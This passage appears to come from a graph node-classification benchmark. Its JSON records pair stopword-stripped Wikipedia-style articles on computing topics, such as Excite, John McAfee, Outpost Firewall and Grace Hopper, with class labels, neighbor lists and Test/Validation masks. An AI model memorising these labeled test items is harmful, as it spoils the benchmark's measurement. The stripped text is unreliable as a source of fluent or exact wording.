impersonate entities intercept traffic independently verified trustwave unable disclose customer due non-disclosure agreement result brief discussion whether egregious enough action trustwave root ca removed mozilla firefox browser however action taken march 2014 trustwave named lawsuit filed trustmark national bank green bank n.a lawsuit alleges trustwave failed provide promised level security target failing meet industry security standards april 2014 notice dismissal filed plaintiffs effectively withdrawing earlier allegations trustwave chairman ceo president robert j. mccullen also stated letter contrary misstated allegations plaintiffs complaints target outsource data security obligations trustwave trustwave monitor target network trustwave process cardholder data target. 2018 gartner named trustwave leader gartner mq managed security service providers worldwide first vendor move leader quadrant since inception global report 2016 idc named trustwave leader idc marketscape emerging managed security services providers based industry analysis buyer perception 2015 gartner magic quadrant managed security services worldwide report evaluated 14 different global managed security service providers trustwave named industry challenger “ due access gained greater resources new markets resulting acquisition singtel increasing investments competing enterprise customers. ” 2014 industry analyst firm forrester research named trustwave one leaders managed security services market",
    "neighbors": [
      517,
      4487,
      5131,
      4755,
      8343,
      5373,
      9215,
      5404,
      2976,
      1314,
      1970,
      9394,
      7228,
      2114,
      1861,
      331,
      6091,
      10196,
      11611,
      4194,
      612,
      3941,
      6372,
      2539,
      4462,
      4081,
      5490,
      1781,
      10745,
      10106,
      5245,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 4472,
    "label": 8,
    "text": "Excite:excite excite stylized excite internet portal launched 1995 provides variety content including news weather metasearch engine web-based email instant messaging stock quotes customizable user homepage currently operated iac applications formerly mindspark iac excite networks u.s. main excite site long personal start page called excite excite also operates e-mail service although longer open new customers original excite company founded 1994 went public two years later excite one recognized brands internet decade main portal site excite.com sixth visited website 1997 fourth 2000 company merged broadband provider home network together went bankrupt 2001 excite portal services acquired iwon.com ask jeeves website went steep decline popularity afterwards january 2019 excite.com ranks 3616th u.s. according alexa rankings popular excite site local japanese one ranks 240th japan excite originally started architext june 1993 garage cupertino california graham spencer joe kraus mark vanharen ryan mcintyre ben lutch martin reinfried students stanford university goal create software manage vast information world wide web july 1994 international data group paid us 80,000 develop online service january 1995 vinod khosla former stanford student partner venture capital firm kleiner perkins caufield byers arranged us 250,000 first round backing project us 1.5 million provided ten-month period soon thereafter geoff yang institutional venture partners introduced additional us 1.5 million financing excite formally launched october 1995 january 1996 george bell joined excite chief executive officer ceo excite also purchased two search engines magellan webcrawler signed exclusive distribution agreements netscape microsoft apple addition companies jim bellows 72 hired excite 1994 figure present content journalistic manner paid good journalists write brief reviews web sites however users wanted get directly content skipped reviews partnership bellows ended 1998 excite original website design mostly based orange color 1997 redesigned black yellow theme mostly continues day april 4 1996 excite went public initial offering two million shares offering however overshadowed biggest rival yahoo also went public time excite six founders became millionaires offering november 1996 america online aol agreed make excite exclusive search directory service return larger 20 percent share excite sale webcrawler june 1997 intuit maker quicken turbotax purchased 19 stake excite finalized seven-year partnership deal october 16 1997 excite purchased netbot comparison shopping agent time intuit announced launch excite business investing later year deal finalized ticketmaster provide direct online ticketing march 31 1998 excite reported net loss approximately 30.2 million according first quarter report enough available capital meet obligations december content excite portal collated 100 different sources excite first portal start offering free e-mail step followed rivals yahoo lycos november 1997 press release showed 11.8 million unique visitors excite network 28-day period september october december 1998 yahoo negotiations purchase excite 5.5 billion 6 billion however prompted kleiner perkins home network chairman ceo thomas jermoluk met excite chairman ceo george bell december 19 excite subsequently acquired home network january 19 1999 time excite sixth largest internet portal traffic one point microsoft also interested excite plans merge msn.com portal according justin rohrlich writing minyanville.com later 1999 two graduate students stanford university sergey brin larry page decided google search engine developed taking time using study went bell offered 1 million bell rejected offer later threw vinod khosla one excite venture capitalists office negotiated brin page 750,000 excite refusal buy became 900 billion company 2019 labeled rohrlich stupid business decision 2014 podcast later cnbc then-ceo excite george bell said deal fell apart larry page wanted excite search technologies replaced google bell agree us 6.7 billion merger excite home network 1999 became one largest mergers two internet companies time home high-speed internet services existing portal combined excite search engine portal move towards personalized web portal content following merger new company named excite home stock symbol company name regulatory filing records remained home corporation athm six months merger tom jermoluk stepped ceo excite home excite george bell president excite division home merger became new ceo combined excite home whilst jermoluk remained chairman board merger billed new media network 21st century following merger excite division purchased imall well online greeting card company blue mountain arts excite also acquired photo sharing company webshots excite furthermore paid sponsorship infiniti indy car driver eddie cheever jr. 2000 2001 racing seasons however merger excite home fell disastrously short expectations online advertising revenue plummeted cable network isp revenue continued grow september 21 2000 stock value dropped 90 george bell announced plans step ceo within six months april 23 2001 excite home announced patti s. hart former ceo telocity would become third ceo three years announcement george bell resigned left company completely company also reported first-quarter net loss 61.6 million compared loss 4.6 million period prior year search engine magellan excite purchased 1996 closed may 2001 june 11 2001 excite home announced raised 100 million financing promethean capital management angelo gordon co. part deal loan repayable immediately excite home stock delisted nasdaq loan structured note convertible shares excite interest rate zero august 20 year excite home replaced auditors ernst young pricewaterhousecoopers triggered demand promethean capital management angelo gordon co immediate repayment 50 million debt furthermore cox cable comcast announced would separate excite home first quarter 2002 september 13 2001 excite home sold blue mountain arts american greetings less 5 paid less two years earlier october 1 2001 excite home filed chapter 11 bankruptcy protection u.s. bankruptcy court northern district california company remaining 1,350 employees laid following months part agreement home national high-speed fiber network access would sold back corporation home liquidating trust became successor company excite home charged sale assets former company end 2001 webshots assets purchased company founders 2.4 million cash bankruptcy court despite financial problems excite network sites continued draw many visitors u.s. albeit behind aol time warner microsoft/msn yahoo collapse excite home iwon.com irvington new york–based venture surreptitiously commenced design new excite website iwon.com planned acquire excite.com domain name brand course bankruptcy proceedings iwon.com eventually made joint bid seattle infospace purchase domain name brand november 28 2001 court accepted bid gave iwon less three weeks launch new excite portal bill daugherty iwon founder co-chief executive time told new york times feel like guy lived hurricane got pounded pounded managed survive everyone else destroyed suddenly walk outside storm beachfront property excite us december 16 2001 iwon launched new excite portal transferred millions excite users new home iwon changed corporate name excite network continued operate excite iwon third portal myway outside united states excite italia took control portals uk germany spain france italy netherlands poland switzerland austria infospace part owned operated web search function excite excite database depreciated instead using overture inktomi search results along dmoz open directory directory dogpile metasearch news results proved short-sighted arrangement searching became big business internet ensuing years excite continued operate excite network acquired ask jeeves ask.com march 2004 ask jeeves promised rejuvenate iwon excite able ask jeeves management became distracted according east bay business times first search feature arms race google yahoo merger barry diller iac/interactivecorp announced march 2005 hopefully start invest get staff place changes portal properties want hope see revenue grow back latter half year said ask jeeves ceo steve berkowitz conference call analysts april 27 2005 may 20 2005 ask jeeves made two announcements regarding rejuvenation excite brand first announced acquired excite italia b.v. operator excite europe tiscali s.p.a. secondly company reported reached comprehensive settlement infospace regarding excite united states whereby ask jeeves infospace would share marketing costs revenue excite web search function regarding acquisition ask jeeves ceo steve berkowitz said look forward working infospace enhance search experience excite interests aligned october 17 2007 goadv media company specializing generation internet traffic announced completion acquisition european excite group companies excite never managed recover back heyday popularity remains notable japan however excite japan headquartered tokyo founded august 4 1997 partnership itochu excite home collapse itochu became majority shareholder excite japan 90 percent bid compete internet service providers like netzero juno online offered free low-cost dial-up access united states excite started offering no-pay service private customers partnering 1stup.com create freelane excite 1stup would allow excite customers download software order able log-on internet software would rotate series sponsored banner advertisements user computer surfed internet 1stup.com soon went business excite switched another partner named worldshare rebranding freelane freelane version 2.0 march 1 2001 freelane discontinued ticketsmate partnership excite sells tickets customers united states portal essentially ticket selling website users buy tickets search thousands events venues powerful search engine capabilities excite server utilized website help user search tickets events since 1999 excite also education portal used people search apply different degrees online courses excite education portal features list thousands educational institutes across america prospective students browse apply",
    "neighbors": [
      11558,
      488,
      7656,
      8735,
      7150,
      119,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 4473,
    "label": 8,
    "text": "Heritrix:heritrix heritrix web crawler designed web archiving written internet archive available free software license written java main interface accessible using web browser command-line tool optionally used initiate crawls heritrix developed jointly internet archive nordic national libraries specifications written early 2003 first official release january 2004 continually improved employees internet archive interested parties heritrix main crawler used crawl content internet archive web collection many years largest contributor collection 2011 alexa internet alexa crawls web purposes using crawler named ia_archiver alexa donates material internet archive internet archive crawling using heritrix smaller scale starting 2008 internet archive began performance improvements wide scale crawling collect content number organizations national libraries using heritrix among older versions heritrix default stored web resources crawls arc file file format wholly unrelated arc file format format used internet archive since 1996 store web archives recently saves default warc file format similar arc precisely specified flexible heritrix also configured store files directory format similar wget crawler uses url name directory filename resource arc file stores multiple archived resources single file order avoid managing large number small files file consists sequence url records header containing metadata resource requested followed http header response arc files range 100 600 mb example heritrix includes command-line tool called arcreader used extract contents arc file following command lists urls metadata stored given arc file cdx format following command extracts hello.html example assuming record starts offset 140 tools heritrix comes several command-line tools tools available part internet archive warctools project tools internet archive links related tools",
    "neighbors": [
      3744,
      8769,
      3875,
      2566,
      714,
      5677,
      2318,
      6797,
      944,
      113,
      7983,
      11284,
      5397,
      823,
      1240,
      1913,
      2459,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 4474,
    "label": 9,
    "text": "Richard_Fateman:richard fateman richard j. fateman born november 4 1946 professor emeritus computer science university california berkeley received bs physics mathematics union college june 1966 ph.d. applied mathematics harvard university june 1971 major contributor macsyma computer algebra system mit later franz lisp system current interests include scientific programming environments computer algebra systems distributed computing analysis algorithms programming measurement large systems design implementation programming languages optical character recognition 1999 inducted fellow association computing machinery richard fateman father musician johanna fateman",
    "neighbors": [
      11488,
      1953,
      5857,
      9231,
      1783,
      3132
    ],
    "mask": "None"
  },
  {
    "node_id": 4475,
    "label": 4,
    "text": "John_McAfee:john mcafee john david mcafee born september 18 1945 british-american computer programmer businessman founded software company mcafee associates 1987 ran 1994 resigned company mcafee associates achieved early success creators mcafee first commercial antivirus software business produces range enterprise security software company purchased intel 2011 spun back 2017 tpg capital owning majority stake though software always borne mcafee brand name mcafee wealth peaked 2007 100 million investments plummeted global financial crisis began year since leaving mcafee associates founded companies tribal voice makers powwow chat program quorumex future tense central among others involved leadership positions companies everykey mgt capital investments luxcore among others personal business interests include smartphone apps cryptocurrency yoga all-natural antibiotics resided number years belize later returned united states 2013 mcafee also political activist sought 2016 libertarian party nomination president united states 2016 election losing former new mexico governor gary johnson mcafee born cinderford forest dean gloucestershire united kingdom september 18 1945 u.s. army base american father stationed english mother raised salem virginia mcafee said feels much british american mcafee 15 father abusive alcoholic committed suicide received bachelor degree mathematics 1967 roanoke college subsequently awarded honorary sc.d degree 2008 mcafee employed programmer nasa institute space studies new york city 1968 1970 went univac software designer later xerox operating system architect 1978 joined computer sciences corporation software consultant worked consulting firm booz allen hamilton 1980–1982 1980s employed lockheed mcafee received copy brain computer virus began developing software combat viruses 1987 mcafee founded mcafee associates computer anti-virus company 1989 quit lockheed began working full-time mcafee associates initially operated home santa clara california company incorporated delaware 1992 mcafee resigned company 1994 two years mcafee associates went public mcafee sold remaining stake company network associates formed 1997 merger mcafee associates network general network associates company name retained seven years renamed mcafee inc august 2010 intel bought mcafee maintaining separate branding january 2014 announced mcafee-related products marketed intel security mcafee expressed pleasure name change saying everlastingly grateful intel freeing terrible association worst software planet unit spun intel april 2017 mcafee llc joint venture tpg capital intel business ventures founded mcafee include tribal voice developed one first instant messaging programs powwow 2000 invested joined board directors zone labs makers firewall software prior acquisition check point software 2003 august 2009 new york times reported mcafee personal fortune declined 4 million peak 100 million effect global financial crisis recession investments 2009 mcafee interviewed belize cnbc special bubble decade reported invested and/or built many mansions usa went unsold 2007 global recession hit report also discussed quest produce plants possible medicinal uses land belize february 2010 mcafee started company quorumex headquartered belize aimed produce commercial natural antibiotics based anti-quorum sensing technology june 2013 mcafee uploaded parody video uninstall mcafee antivirus onto youtube channel video mcafee criticized mcafee antivirus software snorting white powder stroked undressed scantily clad women video garnered 9 million views mcafee told reuters made video ridicule media negative coverage spokesman mcafee inc. called video statements ludicrous also 2013 mcafee started company future tense central aimed produce secure computer network device called d-central 2016 also serving incubator february 2014 mcafee announced cognizant application smartphones displays information permissions installed applications april 2014 cognizant renamed dcentral 1 android version released free google play def con conference las vegas nevada august 2014 warned americans use smartphones suggesting apps used spy clueless consumers read privacy user agreements january 2016 became chief evangelist security startup everykey february 2016 mcafee received media attention publicly volunteering decrypt iphone used san bernardino shooters avoiding need apple build backdoor mcafee later admitted claims simple cracking phone publicity stunt though still claimed could pull may 2016 mcafee appointed chief executive chairman ceo mgt capital investments technology holding company company initially stated would rename john mcafee global technologies although plan abandoned due dispute intel rights mcafee name mcafee changed mgt focus social gaming cybersecurity stating interview anti-virus software dead longer works new paradigm stop hacker getting damage soon joining mgt mcafee claimed team exploited flaw android operating system allowed read encrypted messages whatsapp gizmodo investigated claims reported mcafee sent reporters malware-infected phones make hack work mcafee responded accusations writing course phones malware malware got story release speaking google involves serious flaw android architecture mcafee also moved mgt mining bitcoin cryptocurrencies saying intended make money company increase mgt expertise dealing blockchains thought important cybersecurity extremely bullish bitcoin writing twitter july 2017 predicted price one bitcoin would jump 500,000 within three years eat dick national television november 2017 increased prediction 1 million august 2017 mcafee stepped ceo instead serving mgt chief cybersecurity visionary january 2018 left company altogether sides stated decision amicable mcafee saying wanted spend time cryptocurrencies company stated getting pressured potential investors disassociate mcafee august 13 2018 mcafee took position ceo luxcore cryptocurrency company focused enterprise solutions mcafee identifies libertarian advocating decriminalization cannabis end war drugs non-interventionism foreign policy free market economy redistribute wealth upholds free trade mcafee supports abolishing transportation security administration mcafee advocates increased cyber awareness action threat cyberwarfare mcafee advocated religious liberty saying business owners able deny service cases contradict religious beliefs one forcing buy anything choose one person another forced anything harming choice sell choice buy september 8 2015 mcafee announced would seek office president united states 2016 presidential election candidate newly formed political party called cyber party december 24 2015 re-announced candidacy bid saying would instead seek presidential nomination libertarian party campaign trail mcafee consistently polled among top three presidential candidates party rivals gary johnson austin petersen three candidates appeared libertarian party first nationally televised presidential debate march 29 2016 mcafee announced vice presidential choice would photographer former commercial real estate broker libertarian activist judd weiss mcafee announced plans run president 2020 presidential election primary platform promote use cryptocurrencies stated either seek nomination libertarian party form party mcafee contended taxes illegal claimed filed tax return eight years refers “ prime target ” us internal revenue service mcafee lives wife janice dyson lexington tennessee night mcafee arrived united states deported guatemala december 2012 solicited dyson prostitute south beach florida two spent night together mcafee dyson 30 years mcafee junior subsequently began relationship married 2013 mcafee originally took residence portland oregon 2013 2012 article mensa bulletin magazine american mensa mcafee stated developer first commercial anti-virus program made popular hacking target confiding hackers see hacking badge honor added security people buy computer equipment uses pseudonyms setting computers logging changes ip address several times day asked another occasion personally uses mcafee antivirus software mcafee replied take annoying mcafee claims former cocaine baron boston george jung writing official biography domain mcafee taught yoga written several books yoga june 22 2018 mcafee announced unconscious hospitalized two days vidant medical center greenville north carolina claimed due malicious tampering something ingested since december 2018 mcafee stated several times twitter 47 biological children april 30 2012 mcafee property orange walk town belize raided gang suppression unit belize police department time mcafee bed girlfriend mcafee said traumatized incident gsu press release stated mcafee arrested unlicensed drug manufacturing possession unlicensed weapon released without charge 2012 belize police spokesman raphael martinez confirmed mcafee neither convicted charged suspected november 12 2012 belize police started search mcafee person interest connection murder american expatriate gregory viant faull faull found dead gunshot wound november 11 2012 home island ambergris caye largest island belize faull neighbor mcafee november 2012 interview wired mcafee said always afraid police would kill thus refused routine questions since evaded belizean authorities belize prime minister dean barrow called mcafee extremely paranoid even bonkers mcafee fled belize sought questioning concerning murder magazine vice accidentally gave away mcafee location guatemalan resort early december 2012 photo taken one journalists accompanying mcafee posted exif geolocation metadata still attached guatemala mcafee asked chad essley american cartoonist animator set blog mcafee could write experience run mcafee appeared publicly guatemala city attempted seek political asylum december 5 2012 mcafee arrested illegally entering guatemala shortly afterward placed arrest board review mcafee plea asylum formed committee denied asylum taken holding facility detention center order await deportation belize december 6 2012 reuters abc news reported mcafee two minor heart attacks guatemalan detention center hospitalized mcafee lawyer stated client suffered heart attacks instead suffered high blood pressure anxiety attacks mcafee later said faked heart attacks held guatemala buy time attorney file series appeals ultimately prevented deportation belize thus hastening government decision send back united states december 12 2012 mcafee released detention guatemala deported united states january 2014 belizean police presented new accusations persisted seeking mcafee imprisonment crimes accused however auctioned mcafee seized assets home burned suspicious circumstances august 2 2015 mcafee arrested henderson county tennessee charges one count driving influence one count possession firearm intoxicated november 14 2018 circuit court orlando florida refused dismiss wrongful death lawsuit mcafee faull death january 2019 mcafee announced run u.s. authorities living internationally boat following convening grand jury indict wife four 2020 presidential campaign workers tax-related charges irs independently confirmed existence charges july 2019 mcafee members entourage arrested yacht docked puerto plata dominican republic suspicion carrying high-caliber weapons ammunition held four days released. showtime networks documentary portion mcafee life spent belize began airing september 2016 documentary covers allegations rape mcafee former business partner allison adonizio murders belizean david middleton american expat gregory faull interview bloomberg pimm fox kathleen hayes september 8 2016 mcafee claimed incidents fabricated saying belize third-world banana republic go make story want pay interviewees showtime march 27 2017 announced johnny depp would portray mcafee forthcoming film titled king jungle film focus mcafee life belize takes wired magazine writer tour compound glenn ficarra john requa direct film scott alexander larry karaszewski write script october 2018 announced michael keaton would replace johnny depp key role may 12 2017 mcafee interviewed abc 20/20 regarding alleged murder neighbor greg faull hour janice mcafee john wife also interviewed",
    "neighbors": [
      704,
      161,
      2721,
      3867,
      9248,
      2213,
      8998,
      107,
      7983,
      4435,
      10740,
      9688,
      5305,
      3962,
      1083,
      8668,
      8413,
      1087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4476,
    "label": 1,
    "text": "Polyglot_persistence:polyglot persistence polyglot persistence concept using different data storage technologies handle different data storage needs within given software application polyglot programming term coined neal ford 2006 expresses idea computer applications written mix different programming languages order take advantage fact different languages suitable tackling different problems complex applications combine different types problems picking right language job may productive trying solve aspects problem using single language concept applied databases application communicate different databases using best achieve end goal hence term polyglot persistence numerous databases available solve different problems using single database satisfy program requirements result non-performant jack trades master none solution relational databases example good enforcing relationships exist various data tables discover relationship find data different tables belong object sql join operation used might work data smaller size becomes problematic data involved grows larger graph database might solve problem relationships case big data might solve problem database transactions provided rdbm systems instead nosql document database might used store unstructured data particular part problem thus different problems solved different database systems within application",
    "neighbors": [
      9828,
      8262,
      10413,
      2901,
      9631
    ],
    "mask": "Test"
  },
  {
    "node_id": 4477,
    "label": 1,
    "text": "Object_Design,_Incorporated:object design incorporated object design incorporated often called odi software company founded 1988 developed commercialized object database called objectstore object design founded several former symbolics employees including daniel weinreb based burlington massachusetts objectstore object-oriented database shipped 1990 1994 odi listed 1 inc. magazine list fastest-growing private companies u.s. major early customer telstra used map toll-free telephone numbers end point close caller example local taxi company chain restaurant odi went public 1996 listed nasdaq odis 1999 odi shipped excelon xml application development environment marketed integration server january 2000 odi renamed excelon focussed marketing xml integration software 2002 odi acquired progress software continued develop 2013 progress software sold objectstore product line among others aurea software inc. newly formed operating subsidiary esw capital investment arm trilogy enterprises part deal objectstore moved separate operating subsidiary esw capital",
    "neighbors": [
      10104,
      8201,
      11495,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4478,
    "label": 4,
    "text": "Vigilant_Technology:vigilant technology vigilant technology makes surveillance security systems digital recording systems video content analysis control centers vigilant supports tens thousands cameras airports governmental sites financial institutions correctional facilities casinos city centers vigilant founded february 1999 adi pinhas later formed superfish ronen saggir company formed develop surveillance products based digital video would convert analogue video digital format allowing user compress store retrieve images electronic format vigilant first company perform video compression dvd quality dsp digital signal processor founders group private investors provided seed capital company initially 1999 2000 focused research development vigilant made first sale late 2000 worked pelco us-based video security equipment company range projects vigilant raised capital two rounds 2000 2002 company also received us 2.1 million grant chief scientist fund israel assist research development costs december 2005 company raised £10 million listed london stock exchange ticker symbol vgt since november 2008 vigilant technology wholly owned subsidiary batm advanced communications company products include monitoring management services recording streaming hardware content analysis software ip cameras",
    "neighbors": [
      1046
    ],
    "mask": "None"
  },
  {
    "node_id": 4479,
    "label": 2,
    "text": "XBill:xbill xbill arcade style game x window system game features bespectacled character known bill spoof bill gates goal prevent bill legions clones installing wingdows virus cleverly designed resemble popular operating system parody windows variety computers running operating systems popular among linux gamers end 1990s beating quake though quake ii linux journal reader favourite linux game 1999 operating systems represented logos shown computer screens computers player must defend include pcs running linux bsd sparcstations solaris sgi irix workstations apple macintosh palmpilots nextcubes bill installs wingdows onto computer current operating system placed beside using mouse player must squash bill drag discarded operating systems back computers end level points accrued every computer still running original operating system later levels computers connected lan cables causing wingdows spread faster computers may also catch fire cured dragging buckets water onto game written brian wellington matias duarte summer 1994 originally written c++ code base later version 2.1 refactored c. game later end 1990s deliberately ported microsoft windows ports many platforms mac os x openmoko android maemo phones followed due open source nature re-implementations game also exist 2009 project resurrected xbill-ng similar concept lincity-ng xbill popular among linux gamers end 1990s beating quake though quake ii linux journal reader favourite linux game 1999 game holds four five stars linux game tome noted desktoplinux.com despite status always packaged linux distributions due disparaging content instance fedora integrate debian somewhat illustrating notoriety graphics game used website 2009 free software foundation campaign windows 7 sins",
    "neighbors": [
      4225,
      9955,
      5988,
      10051,
      6797,
      7983,
      1011,
      1621,
      823,
      7739,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4480,
    "label": 4,
    "text": "Outpost_Firewall_Pro:outpost firewall pro outpost firewall pro discontinued personal firewall developed agnitum founded 1999 st. petersburg russia outpost firewall pro monitors incoming outgoing network traffic windows machines outpost also monitors application behavior attempt stop malicious software covertly infecting windows systems agnitum called technology component control anti-leak control included hips-based host protection module product also includes spyware scanner monitor along pop-up blocker spyware filter internet explorer mozilla firefox outpost web surfing security tools included black-lists ips urls unwanted web page element filters ad-blocking technology altogether known web control version 7.5 adds new techniques help pc users block unknown new threats activation version 8 introduces improvements well windows 8 compatibility redesigned user interface version 8 also extends x64 host-based intrusion-prevention system hips support outpost firewall pro allows user specifically define pc application connects internet known rules wizard mode policy default behavior program mode outpost firewall pro displays prompt time new process attempts network access process requests connection covered pre-validated rules idea let user decide whether application allowed network connection specific address port protocol outpost firewall includes pre-set rules many popular applications users could optionally submit rules created first versions outpost firewall pro 1.0–4.0 allow users create plugins add third-party plugins meet specific needs later versions plugin programming interface outpost firewall pro users developed unofficial web forum fed agnitum since 2002 discuss product features support forum moderated experienced senior users outpost firewall pro offers help support technical advice program assistance outpost firewall pro self-protection technology aims detecting attempts modify disable services hinder program protection received accolades comparison testers capable sophisticated detecting known methods disabling without user permission testing site matousec.com performing test-set leak-tests known software including pc firewalls consistently gives outpost firewall pro highest ratings pc firewalls independent comparisons outpost firewall pro 30 awards 15 countries computer media test labs since 2002 product also licensed several security software publishers 2003–2010 sophos uk usa lavasoft sweden canon japan bullguard uk cat-quickheal india novell usa avg czech republic czech republic proland software india others outpost generate large number security alerts experts believe lead inexperienced end-user habitually dismissing alerts even important ones firewall preferred experienced users agnitum direction give end user complete control aspects system avoid unwanted changes malicious software disclosure personal information malware advanced security mode outpost component control notify user every time network enabled application changed component anti-leak control notify user whenever application performs potentially dangerous operation overwriting another application memory space practice result high number alerts quickly become intrusive mediate outpost includes option apply validated pre-sets automatically allow secure configuration yet provide ease use december 9 2015 yandex acquired agnitum order use technology yandex browser valid license holders given january 31 2016 exchange license keys 1 year license kaspersky internet security",
    "neighbors": [
      1792,
      2049,
      2563,
      5380,
      6797,
      1172,
      9496,
      10392,
      3482,
      1052,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      4403,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      9055,
      5860,
      3942,
      10987,
      5356,
      6382,
      8943,
      4464,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4481,
    "label": 9,
    "text": "Document_Structuring_Conventions:document structuring conventions document structuring conventions dsc set standards postscript based use comments primarily specifies way structure postscript file way expose structure machine-readable way postscript file conforms dsc called conforming document need structuring convention arises since postscript turing-complete programming language thus guaranteed method — short actually printing document — things like determining many pages long given document large given page skip particular page addition structure dsc comments exposing structure helps provide way e.g. intelligent print spooler ability rearrange pages printing page layout program find bounding box postscript file used graphic image collectively program takes postscript files input data called document manager order postscript print file properly distill pdf using adobe tools conform basic dsc standards dsc comments serve second function specifying way tell document manager certain things like inserting font postscript code collectively called resources file dsc comments serve second function akin preprocessing directives purely comments documents using kinds dsc comments require functioning document manager come intended sending directly printer work dsc basis encapsulated postscript eps files conforming documents restrictions set dsc comments expanded mechanism called open structuring conventions together eps specification form basis early versions adobe illustrator artwork file format basic premise dsc separation prolog static definitions script code affects job-specific printed output plus disallowing certain postscript operators deemed inappropriate page descriptions ensures basic level predictability postscript code thus forming basis document manageability optional additional layer document manageability provided separating script document setup section zero functionally independent pages optional trailer cleanup code “ zero pages ” dsc usually means “ one page without use postscript ‘ showpage ’ operator functional independence pages plus disallowing postscript operators pages section form basis page independence allows pages reordered independently randomly accessed imposed structure exposed delimiting postscript file dsc comments normally begin two percent signs followed keyword keywords need followed colon optional space character series arguments finally document marked conforming starting comment starting “ ps-adobe- ” followed dsc version number sections reusable postscript code modularized procsets procedure sets corresponding function libraries programming languages order ease generation postscript code procsets postscript resources example fonts omitted postscript file externally referenced directive-like dsc comment external referencing however work document manager understands dsc comments dsc version 3.0 released september 25 1992 specification states even though dsc comments layer communication beyond postscript language affect final output use considered good postscript language programming style thus postscript-producing programs output dsc-conformant comments along code although programs actually produce conforming documents dsc-conforming document one generated dvips might begin following meaning",
    "neighbors": [
      5896,
      1609,
      10953,
      3916,
      8627,
      2804,
      8628
    ],
    "mask": "None"
  },
  {
    "node_id": 4482,
    "label": 8,
    "text": "JavaScript_templating:javascript templating javascript templating refers client side data binding method implemented javascript language approach became popular thanks javascript increased use increase client processing capabilities trend outsource computations client web browser popular javascript templating libraries angularjs backbone.js ember.js handlebars.js vue.js mustache.js frequent practice use double curly brackets i.e nowiki /nowiki call values given key data files often json objects examples use external file codice_1 following contents examples produce following html list templating becomes useful information distributed may change large maintained various html pages available human resources large enough require heavier server-side templating",
    "neighbors": [
      4482,
      803,
      3462,
      5255
    ],
    "mask": "None"
  },
  {
    "node_id": 4483,
    "label": 9,
    "text": "Grace_Hopper:grace hopper grace brewster murray hopper december 9 1906 – january 1 1992 american computer scientist united states navy rear admiral one first programmers harvard mark computer pioneer computer programming invented one first linkers popularized idea machine-independent programming languages led development cobol early high-level programming language still use today prior joining navy hopper earned ph.d. mathematics yale university professor mathematics vassar college hopper attempted enlist navy world war ii rejected 34 years old instead joined navy reserves hopper began computing career 1944 worked harvard mark team led howard h. aiken 1949 joined eckert–mauchly computer corporation part team developed univac computer eckert–mauchly began developing compiler believed programming language based english possible compiler converted english terms machine code understood computers 1952 hopper finished program linker originally called compiler written a-0 system wartime service co-authored three papers based work harvard mark 1 1954 eckert–mauchly chose hopper lead department automatic programming led release first compiled languages like flow-matic 1959 participated codasyl consortium consulted hopper guide creating machine-independent programming language led cobol language inspired idea language based english words 1966 retired naval reserve 1967 navy recalled active duty retired navy 1986 found work consultant digital equipment corporation sharing computing experiences u.s. navy guided-missile destroyer named cray xe6 hopper supercomputer nersc lifetime hopper awarded 40 honorary degrees universities across world college yale university renamed honor 1991 received national medal technology november 22 2016 posthumously awarded presidential medal freedom president barack obama hopper born new york city eldest three children parents walter fletcher murray mary campbell van horne scottish dutch descent attended west end collegiate church great-grandfather alexander wilson russell admiral us navy fought battle mobile bay civil war grace curious child lifelong trait age seven decided determine alarm clock worked dismantled seven alarm clocks mother realized limited one clock preparatory school education attended hartridge school plainfield new jersey hopper initially rejected early admission vassar college age 16 test scores latin low admitted following year graduated phi beta kappa vassar 1928 bachelor degree mathematics physics earned master degree yale university 1930 1934 earned ph.d. mathematics yale direction øystein ore dissertation new types irreducibility criteria published year hopper began teaching mathematics vassar 1931 promoted associate professor 1941 married new york university professor vincent foster hopper 1906–1976 1930 divorce 1945 marry chose retain surname hopper tried enlist navy early world war ii rejected reasons age 34 old enlist weight height ratio low also denied basis job mathematician mathematics professor vassar college valuable war effort war 1943 hopper obtained leave absence vassar sworn united states navy reserve one many women volunteered serve waves get exemption enlist navy minimum weight reported december trained naval reserve midshipmen school smith college northampton massachusetts hopper graduated first class 1944 assigned bureau ships computation project harvard university lieutenant junior grade served mark computer programming staff headed howard h. aiken hopper aiken co-authored three papers mark also known automatic sequence controlled calculator hopper request transfer regular navy end war declined due advanced age 38 continued serve navy reserve hopper remained harvard computation lab 1949 turning full professorship vassar favor working research fellow navy contract harvard 1949 hopper became employee eckert–mauchly computer corporation senior mathematician joined team developing univac i. hopper also served univac director automatic programming development remington rand univac first known large-scale electronic computer market 1950 competitive processing information mark hopper recommended development new programming language would use entirely english words told quickly could n't computers n't understand english still persisted “ much easier people write english statement use symbols ” explained “ decided data processors ought able write programs english computers would translate machine code. ” idea accepted 3 years meantime published first paper subject compilers 1952 early 1950s company taken remington rand corporation working original compiler work done program known compiler first version a-0 1952 operational link-loader time referred compiler later said nobody believed running compiler nobody would touch told computers could arithmetic goes say compiler translated mathematical notation machine code manipulating symbols fine mathematicians good data processors symbol manipulators people really symbol manipulators become professional mathematicians data processors much easier people write english statement use symbols decided data processors ought able write programs english computers would translate machine code beginning cobol computer language data processors could say subtract income tax pay instead trying write octal code using kinds symbols cobol major language used today data processing 1954 hopper named company first director automatic programming department released first compiler-based programming languages including math-matic flow-matic spring 1959 computer experts industry government brought together two-day conference known conference data systems languages codasyl hopper served technical consultant committee many former employees served short-term committee defined new language cobol acronym common business-oriented language new language extended hopper flow-matic language ideas ibm equivalent comtran hopper belief programs written language close english rather machine code languages close machine code assembly languages captured new business language cobol went ubiquitous business language date among members committee worked cobol mount holyoke college alumnus jean e. sammet 1967 1977 hopper served director navy programming languages group navy office information systems planning promoted rank captain 1973 developed validation software cobol compiler part cobol standardization program entire navy 1970s hopper advocated defense department replace large centralized systems networks small distributed computers user computer node could access common databases located network developed implementation standards testing computer systems components significantly early programming languages fortran cobol navy tests conformance standards led significant convergence among programming language dialects major computer vendors 